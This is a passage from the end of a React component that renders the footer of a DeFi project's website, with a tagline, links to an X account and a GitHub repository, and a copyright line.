            <p className="text-gray-500 text-sm">Empowering the next generation of DeFi.</p>
          </div>
          <div className="flex gap-4">
             <a href="https://twitter.com/PowerPrtcl" target="_blank" rel="noreferrer" className="w-12 h-12 rounded-full bg-cardBg border border-gray-800 flex items-center justify-center hover:bg-[#b37be8] hover:text-white transition-all">
                {/* SVG Logo X Terbaru */}
                <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                  <path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"/>
                </svg>
             </a>
             <a href="https://github.com/Pixion-Games/ronin-assets" target="_blank" rel="noreferrer" className="w-12 h-12 rounded-full bg-cardBg border border-gray-800 flex items-center justify-center hover:bg-[#b37be8] hover:text-white transition-all">
                <Github size={20}/>
             </a>
          </div>
        </div>
        <p className="text-center text-xs text-gray-700 mt-12 font-medium">© 2026 Power Protocol. All rights reserved.</p>
      </footer>

    </div>
  );
}

export default App;